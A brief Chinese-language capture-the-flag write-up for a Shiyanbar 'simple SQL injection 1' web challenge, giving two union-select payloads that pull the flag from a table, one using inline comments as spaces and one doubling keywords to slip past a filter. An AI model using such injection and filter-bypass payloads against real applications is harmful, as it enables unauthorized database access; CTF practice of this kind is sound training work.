【实验吧】CTF_Web_简单的SQL注入之1

 

 

 

 题目链接：http://ctf5.shiyanbar.com/423/web/

简单的SQL注入之1，比2，3都简单一些。利用2 的查询语句也可以实现：1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

 

经测试，简单的SQL注入1 过滤了关键字，重复写即可绕过，如：1' unionunion  selectselect  flag  fromfrom  web1.flag  wherewhere  '1'='1